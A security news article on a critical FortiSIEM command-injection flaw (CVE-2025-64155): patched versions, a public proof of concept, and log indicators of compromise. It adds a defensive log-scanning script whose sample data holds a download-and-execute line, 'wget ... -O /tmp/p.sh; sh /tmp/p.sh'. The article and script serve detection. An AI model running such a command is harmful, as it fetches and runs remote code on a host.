FortiSIEM: Proof-of-Concept Exploit for Critical Vulnerability Publicly Available
Fortinet has closed a critical FortiSIEM vulnerability. A publicly available proof-of-concept exploit increases the likelihood of attacks.
During the night leading into Wednesday of this week, Fortinet released updates for several security vulnerabilities, among them a critical one in FortiSIEM. A proof-of-concept exploit for it is now publicly available, which lowers the bar for malicious actors to exploit the flaw. Attacks against it are therefore significantly more likely. Admins should apply the updates now at the latest.
The vulnerability in question is tracked as CVE-2025-64155 (CVSS 9.4, risk “critical”). Using carefully crafted TCP requests, attackers on the network can inject commands that are then executed. The cause is insufficient filtering of special elements used in operating system commands. FortiSIEM versions 7.4.1, 7.3.5, 7.2.7, and 7.1.9 fix the flaw; older versions must be migrated to these release lines to close the security hole.
The vulnerability was discovered by IT researchers from the company horizon3.ai. They also developed and publicly released a proof-of-concept exploit on GitHub. Their report explains the security vulnerability in detail. Additionally, the IT researchers have listed example indicators of compromise (IOCs).
Attack Indicators in Log File
According to the report, message contents handled by the vulnerable phMonitor service end up in log files in the directory “/opt/phoenix/log/phoenix.logs”. In these log files, administrators should look for entries containing “PHL_ERROR”. Those entries reveal the URL from which malicious code was downloaded and the file on the system it was then written to.
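A small log-triage script for the check described above, added here as an example and not taken from the horizon3.ai report or from Fortinet. It scans the directory named in the report for “PHL_ERROR” entries that carry a download URL and pulls out the URL and any local file paths next to it; the sample log lines and their field layout are constructed for illustration, since the page does not show the real log format.

```python
import re
from pathlib import Path

# Directory named in the horizon3.ai report; the marker string is from the same source.
LOG_DIR = Path("/opt/phoenix/log/phoenix.logs")
MARKER = "PHL_ERROR"

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Absolute paths not glued to a preceding word or slash (so URL path components are ignored).
PATH_RE = re.compile(r"(?<![\w/])/(?:[\w.\-]+/)*[\w.\-]+")


def suspicious_entries(lines):
    """Yield (line_no, urls, paths) for each PHL_ERROR line that references a download URL."""
    for line_no, line in enumerate(lines, 1):
        if MARKER not in line:
            continue
        urls = URL_RE.findall(line)
        if not urls:
            continue  # PHL_ERROR lines without a URL are ordinary service errors
        paths = [p for p in PATH_RE.findall(line) if not any(p in u for u in urls)]
        yield line_no, urls, list(dict.fromkeys(paths))  # dedupe, keep order


def scan_directory(log_dir=LOG_DIR):
    """Return (file, line_no, urls, paths) tuples for every log file in log_dir."""
    hits = []
    if not log_dir.is_dir():
        return hits
    for log_file in sorted(p for p in log_dir.iterdir() if p.is_file()):
        with log_file.open(errors="replace") as fh:
            for line_no, urls, paths in suspicious_entries(fh):
                hits.append((str(log_file), line_no, urls, paths))
    return hits


# Constructed sample lines (layout is assumed, not FortiSIEM's actual format).
SAMPLE_LINES = [
    "2025-11-19 02:14:07 PHL_INFO phMonitor heartbeat ok",
    "2025-11-19 02:14:09 PHL_ERROR phMonitor: unexpected request body: "
    "wget http://203.0.113.5/p.sh -O /tmp/p.sh; sh /tmp/p.sh",
    "2025-11-19 02:14:10 PHL_ERROR phMonitor: config reload failed",
]

if __name__ == "__main__":
    for hit in scan_directory() or list(suspicious_entries(SAMPLE_LINES)):
        print(hit)
```

Run it on a FortiSIEM host to list candidate entries; each reported URL and target path then needs manual review against known-good activity.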
The horizon3.ai researchers state that they found the now-closed vulnerability while analyzing the FortiSIEM vulnerability CVE-2025-25256 from last August. Exploit code for that flaw was also available at the time.
(dmk)